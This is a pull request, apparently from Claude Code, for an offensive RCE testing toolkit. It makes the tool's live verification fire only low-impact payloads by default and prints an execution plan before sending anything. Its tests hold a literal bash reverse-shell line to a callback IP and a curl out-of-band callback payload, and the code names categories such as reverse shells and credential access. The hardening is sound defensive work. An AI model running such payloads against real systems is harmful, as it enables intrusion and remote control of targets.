### PR TITLE
Make verification safe by default with an execution plan

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
 # RCEKit — RCE Testing Toolkit
 
-**Version 2.4.0** · MIT · Python 3.8+ · no third-party dependencies
+**Version 2.5.0** · MIT · Python 3.8+ · no third-party dependencies
 
 RCEKit is an offensive **RCE testing toolkit** for authorised penetration
 testing, red teaming, and security research. It covers the full loop, not just
@@ -78,6 +78,7 @@ and does not. Only run any of this against systems you are authorised to test.
 | `--verify-data` / `--verify-header` / `--verify-method` | Body (with `FUZZ`) / repeatable header / HTTP method | — |
 | `--verify-url-location` / `--verify-body-location` | How to encode the payload at the URL / body injection point | `query_value` / auto |
 | `--verify-delay` / `--verify-timeout` | Seconds between requests / per-request timeout | `0` / `8` |
+| `--verify-active-risk` | Highest safety tier `--verify-url` may fire (`safe`/`intrusive`/`stateful`) | `safe` |
 | `--verify-allow-destructive` | Let verification fire destructive payloads (persistence/backdoors); skipped by default | Off |
 | `--listen` + `--correlate <map.jsonl>` | Run the OOB listener and map callbacks to payloads | Off |
 | `--listen-http-port` / `--listen-dns-port` / `--listen-answer-ip` / `--listen-log` | Listener HTTP/DNS ports, DNS answer IP, hit log | `8080` / `5335` / `127.0.0.1` / — |
@@ -265,6 +266,15 @@ is re-checked against a paired **same-token control** (the token in an inert,
 non-executing carrier at the same injection point), so a target that merely
 echoes input cannot pass as execution, and a command-output signature is checked
 against the payload-free baseline response.
+
+**Safe by default.** Verification fires only low-impact proofs (enumeration,
+file reads, code-execution and WAF-bypass signatures). Reverse shells,
+download-execute, credential access, lateral movement, container escape,
+cloud-metadata and OOB payloads are all held back unless you raise the ceiling
+with `--verify-active-risk intrusive` (independent of `--max-safety`, which only
+governs file output). Before anything is fired, an **execution plan** prints the
+request, the number of unique payloads, the safety-tier breakdown, any
+high-impact categories, and every network / out-of-band callback destination.
 
 Rate-limit with `--verify-delay` and cap with `--max-payloads`. OOB payloads are
 sent but confirmed out-of-band (see below). **Destructive payloads (persistence,

--- a/rcekit.py
+++ b/rcekit.py
@@ -26,7 +26,7 @@ logger = logging.getLogger(__name__)
 
 # Bump on every change: PATCH for fixes, MINOR for new capabilities, MAJOR for
 # breaking changes to the CLI, output formats, or template schema.
-__version__ = "2.4.0"
+__version__ = "2.5.0"
 
 SAFETY_ORDER = {"safe": 0, "intrusive": 1, "stateful": 2}
 
@@ -1578,6 +1578,62 @@ class OOBListener:
         return True
 
 
+# Categories whose payloads have a real-world side effect when fired at a live
+# target (an outbound connection, a callback, credential access, a foothold),
+# as opposed to read-only enumeration. Surfaced in the verification plan and
+# held back unless the operator raises --verify-active-risk.
+HIGH_RISK_CATEGORIES = {
+    "reverse_shells", "download_execute", "credential_access",
+    "lateral_movement", "container_escape", "cloud_metadata", "persistence",
+}
+
+
+def build_verification_plan(records: List[PayloadRecord], method: str, url: str,
+                            attacker_ip: Optional[str] = None,
+                            attacker_domain: Optional[str] = None,
+                            max_payloads: Optional[int] = None):
+    """Summarise what a verification run will send *before* anything is fired,
+    so a high-impact set is never sent silently. Returns ``(lines, to_send)``
+    where ``to_send`` is the deduplicated, capped record list actually sent."""
+    to_send: List[PayloadRecord] = []
+    seen: Set[str] = set()
+    for record in records:
+        if record.payload in seen:
+            continue
+        seen.add(record.payload)
+        to_send.append(record)
+    if max_payloads:
+        to_send = to_send[:max_payloads]
+
+    by_safety: Dict[str, int] = {}
+    high_risk: Dict[str, int] = {}
+    destinations: Set[str] = set()
+    for record in to_send:
+        by_safety[record.safety] = by_safety.get(record.safety, 0) + 1
+        if record.category in HIGH_RISK_CATEGORIES:
+            high_risk[record.category] = high_risk.get(record.category, 0) + 1
+        if record.oob_host:
+            destinations.add(record.oob_host.split(".", 1)[-1] if "." in record.oob_host else record.oob_host)
+        if attacker_ip and attacker_ip in record.payload:
+            destinations.add(attacker_ip)
+        if attacker_domain and attacker_domain in record.payload:
+            destinations.add(attacker_domain)
+
+    lines = [
+        f"[plan] {method} {url}",
+        f"[plan] {len(to_send)} unique payloads to send"
+        + (f" (capped at --max-payloads {max_payloads})" if max_payloads else ""),
+        "[plan] safety tiers: " + (", ".join(f"{k}={v}" for k, v in sorted(by_safety.items())) or "none"),
+    ]
+    if high_risk:
+        lines.append("[plan] HIGH-IMPACT categories: "
+                     + ", ".join(f"{k}={v}" for k, v in sorted(high_risk.items())))
+    if destinations:
+        lines.append("[plan] network / out-of-band callback destinations: "
+                     + ", ".join(sorted(destinations)))
+    return lines, to_send
+
+
 def load_token_manifest(path: str) -> Dict[str, Dict[str, Any]]:
     """Load a .map.jsonl manifest into a token -> entry dict."""
     tokens: Dict[str, Dict[str, Any]] = {}
@@ -1644,6 +1700,11 @@ def main():
                              "encodes for x-www-form-urlencoded; raw sends it verbatim")
     parser.add_argument("--verify-allow-destructive", action="store_true",
                         help="Allow --verify-url to fire destructive payloads (persistence/backdoors/etc.); off by default")
+    parser.add_argument("--verify-active-risk", choices=["safe", "intrusive", "stateful"], default=None,
+                        help="Highest safety tier --verify-url may fire (default: safe). The default holds "
+                             "back reverse shells, download-execute, credential access, lateral movement, "
+                             "container escape, cloud-metadata and OOB payloads; pass 'intrusive' to include "
+                             "them. Independent of --max-safety, which only governs file output")
     parser.add_argument("--listen", action="store_true",
                         help="Run the built-in OOB listener (HTTP+DNS) that records callbacks and correlates them to payload tokens")
     parser.add_argument("--listen-http-port", type=int, default=8080,
@@ -1791,10 +1852,16 @@ def main():
         method = args.verify_method or ("POST" if args.verify_data else "GET")
         verify_token = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))
         generator.log_exploitation_usage(f"VERIFY:{verify_token} url={args.verify_url}", args)
+        # Safe by default: verification fires only low-impact proofs unless the
+        # operator explicitly raises the ceiling. This holds back reverse shells,
+        # download-execute, credential access, lateral movement, container
+        # escape, cloud-metadata and OOB payloads (all classified 'intrusive'),
+        # independent of --max-safety (which only governs file output).
+        verify_max_safety = args.verify_active_risk or "safe"
         records = generator.generate_payload_records(
             selected_contexts=selected_contexts, selected_categories=selected_categories,
             selected_encodings=selected_encodings, selected_environments=selected_environments,
-            mode=mode, watermark_token=watermark_token, max_safety=max_safety,
+            mode=mode, watermark_token=watermark_token, max_safety=verify_max_safety,
             include_blocking=include_blocking, oob_domain=oob_domain,
         )
         if deny_chars or max_length or needs_separator or blind:
@@ -1810,9 +1877,24 @@ def main():
                     yield record
 
             records = _drop_destructive(records)
+        # Materialise (this also tallies the destructive skips) and show an
+        # execution plan before anything is fired.
+        records = list(records)
+        plan_lines, to_send = build_verification_plan(
+            records, method, args.verify_url,
+            attacker_ip=generator.attacker_ip, attacker_domain=generator.attacker_domain,
+            max_payloads=args.max_payloads)
+        for line in plan_lines:
+            print(line)
+        if skipped_destructive[0]:
+            print(f"[plan] holding back {skipped_destructive[0]} destructive payloads "
+                  "(persistence/backdoors/etc.); pass --verify-allow-destructive to include them.")
+        if verify_max_safety == "safe":
+            print("[plan] low-impact (safe) payloads only; pass --verify-active-risk intrusive to also "
+                  "fire reverse shells, download-execute, credential access, lateral movement and OOB.")
         print(f"[verify] {method} {args.verify_url}  (authorised target)")
         results = generator.run_verification(
-            records, url=args.verify_url, method=method, data=args.verify_data,
+            to_send, url=args.verify_url, method=method, data=args.verify_data,
             headers=args.verify_header, delay=args.verify_delay, timeout=args.verify_timeout,
             max_payloads=args.max_payloads,
             url_location=args.verify_url_location, body_location=args.verify_body_location,
@@ -1823,9 +1905,6 @@ def main():
         confirmed = [r for r in results if r["verdict"] == "confirmed"]
         print(f"[verify] sent {len(results)} unique payloads: " +
               ", ".join(f"{v}={c}" for v, c in sorted(by_verdict.items())))
-        if skipped_destructive[0]:
-            print(f"[verify] skipped {skipped_destructive[0]} destructive payloads "
-                  "(persistence/backdoors/etc.); pass --verify-allow-destructive to include them.")
         if confirmed:
             print(f"\n[verify] CONFIRMED execution ({len(confirmed)}):")
             for result in confirmed:

--- a/tests/test_generator.py
+++ b/tests/test_generator.py
@@ -1095,6 +1095,85 @@ class GeneratorTestCase(unittest.TestCase):
             server.shutdown()
             server.server_close()
 
+    def test_build_verification_plan(self):
+        recs = [
+            make_record(payload="; id", category="basic_enum", safety="safe"),
+            make_record(payload="; id", category="basic_enum", safety="safe"),  # duplicate
+            make_record(payload="bash -i >& /dev/tcp/192.168.1.100/4444 0>&1",
+                        category="reverse_shells", safety="intrusive"),
+            make_record(payload="; curl http://tok.oob.example/", category="oob",
+                        safety="intrusive", expected_channel="interactsh",
+                        token="tok", oob_host="tok.oob.example"),
+        ]
+        lines, to_send = rcekit.build_verification_plan(
+            recs, "GET", "http://t/?x=FUZZ",
+            attacker_ip="192.168.1.100", attacker_domain="attacker.com")
+        self.assertEqual(len(to_send), 3, "duplicate payloads collapse")
+        text = "\n".join(lines)
+        self.assertIn("3 unique payloads", text)
+        self.assertIn("HIGH-IMPACT", text)
+        self.assertIn("reverse_shells", text)
+        self.assertIn("192.168.1.100", text)          # reverse-shell callback host
+        self.assertIn("oob.example", text)            # OOB callback domain
+        # --max-payloads caps what will be sent.
+        _, capped = rcekit.build_verification_plan(recs, "GET", "u", max_payloads=1)
+        self.assertEqual(len(capped), 1)
+
+
+class VerifySafeByDefaultTestCase(unittest.TestCase):
+    """The CLI must not fire high-impact payloads at a target by default."""
+
+    def _serve(self):
+        import http.server
+        import socketserver
+        import threading
+
+        class Handler(http.server.BaseHTTPRequestHandler):
+            def log_message(self, *a):
+                pass
+
+            def _ok(self):
+                self.send_response(200)
+                self.end_headers()
+                self.wfile.write(b"ok")
+
+            do_GET = _ok
+            do_POST = _ok
+
+        server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), Handler)
+        port = server.server_address[1]
+        threading.Thread(target=server.serve_forever, daemon=True).start()
+        return server, port
+
+    def _run(self, *args):
+        return subprocess.run(
+            [sys.executable, str(SCRIPT), *args],
+            cwd=str(REPO_ROOT), capture_output=True, text=True, timeout=120,
+        )
+
+    def test_reverse_shells_are_held_back_by_default(self):
+        server, port = self._serve()
+        try:
+            url = f"http://127.0.0.1:{port}/?x=FUZZ"
+            # Default: reverse shells are 'intrusive', so nothing is fired.
+            safe = self._run("--acknowledge-consent", "--categories", "reverse_shells",
+                             "--environments", "unix", "--verify-url", url)
+            self.assertEqual(safe.returncode, 0, safe.stderr)
+            self.assertIn("0 unique payloads to send", safe.stdout)
+            self.assertIn("--verify-active-risk intrusive", safe.stdout)
+            # Opt in: now they are included and the plan flags the high-impact set.
+            active = self._run("--acknowledge-consent", "--categories", "reverse_shells",
+                               "--environments", "unix", "--verify-active-risk", "intrusive",
+                               "--max-payloads", "15", "--verify-url", url)
+            self.assertEqual(active.returncode, 0, active.stderr)
+            self.assertIn("HIGH-IMPACT", active.stdout)
+            self.assertIn("reverse_shells", active.stdout)
+            self.assertIn("192.168.1.100", active.stdout)  # reverse-shell callback host
+            self.assertNotIn("0 unique payloads to send", active.stdout)
+        finally:
+            server.shutdown()
+            server.server_close()
+
 
 if __name__ == "__main__":
     unittest.main()


### PR DESCRIPTION
## Problem

`--verify-url` generated payloads up to the `intrusive` tier by default, so **reverse shells, download-execute, credential access, lateral movement, container escape, cloud-metadata and OOB payloads were fired at the target with no opt-in**. Only the narrower `destructive` set (persistence/backdoors) was held back. The run also started firing with no upfront summary of what it would do or where it would call back to.

## Fix

- **Safe by default.** The verification ceiling now defaults to `safe`, so only low-impact proofs are fired (enumeration, file reads, code-execution and WAF-bypass signatures). The dangerous categories above are all classified `intrusive` and are held back.
- **Explicit opt-in.** New `--verify-active-risk {safe,intrusive,stateful}` raises the ceiling, independent of `--max-safety` (which only governs file output). `--verify-allow-destructive` still gates the destructive subset.
- **Execution plan.** Before anything is fired, an execution plan prints the request, the number of unique payloads, the safety-tier breakdown, any high-impact categories, and every network / out-of-band callback destination — so a high-impact set is never sent silently.

```
[plan] GET http://target.example/?x=FUZZ
[plan] 15 unique payloads to send (capped at --max-payloads 15)
[plan] safety tiers: intrusive=15
[plan] HIGH-IMPACT categories: reverse_shells=15
[plan] network / out-of-band callback destinations: 192.168.1.100
```

## Behaviour change

A run that previously fired intrusive payloads by default now fires only `safe` ones unless `--verify-active-risk intrusive` is passed. This is the intended hardening; the flag restores the old breadth.

## Tests

- Unit test for the plan builder (dedup, cap, safety breakdown, high-impact detection, callback destinations).
- CLI end-to-end test: reverse shells are held back by default (`0 unique payloads to send`) and included only under `--verify-active-risk intrusive`, where the plan flags the high-impact set and the callback host.
- Full suite: 73/73 green, offline, no third-party dependencies.

## Versioning

Bumped to `2.5.0` (new flag, plan output, safer default) and synced the README badge and verification docs.

---
_Generated by [Claude Code](https://claude.ai/code/session_013vVUUNtsiMzfdCKPouUjB6)_